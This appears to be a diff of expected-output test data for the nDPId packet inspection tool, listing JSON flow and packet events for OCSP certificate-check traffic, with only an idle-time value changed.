-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"} 
-00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"} 
-00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="} 
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"} 
-00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="} -00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
-00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"} +00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="} 
+00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"} 
+00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 